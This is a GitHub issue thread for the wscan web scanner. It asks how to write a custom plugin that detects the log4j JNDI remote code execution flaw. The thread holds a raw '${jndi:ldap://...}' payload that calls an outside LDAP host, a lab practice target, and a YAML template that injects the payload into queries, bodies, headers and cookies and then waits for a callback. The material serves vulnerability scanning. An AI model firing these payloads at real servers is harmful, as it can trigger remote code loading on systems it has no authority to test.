How to use custom plugins to perform log4j RCE vulnerability scans？

chushuai / wscan

Wscan is a web security scanner that focuses on web security, dedicated to making web security accessible to everyone.

Other

537 stars 66 forks source link

How to use custom plugins to perform log4j RCE vulnerability scans？ #19

Open chushuai opened 4 months ago

chushuai commented 4 months ago

${jndi:ldap://xxx.xxx.xxx.xxxx:80/i/hcSvqI7U/71534c/303r/i9nl/PQ5P8iBh}

Target practice location https://zkaq:zkaq@d63bb2586.lab.aqlab.cn/

https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd

chushuai commented 4 months ago

name: custom-reverse

set:
  reverse: newReverse()
  reverseURL: reverse.ldap_url

payload:
  -  ${jndi:{{reverseURL}}}

placeholder:
  - query
  - body
  - header
  - cookie

expression: reverse.wait(15)

detail:
  author: shaochuyu
  links:
    - https://github.com/chushuai/wscan
  version: 1.0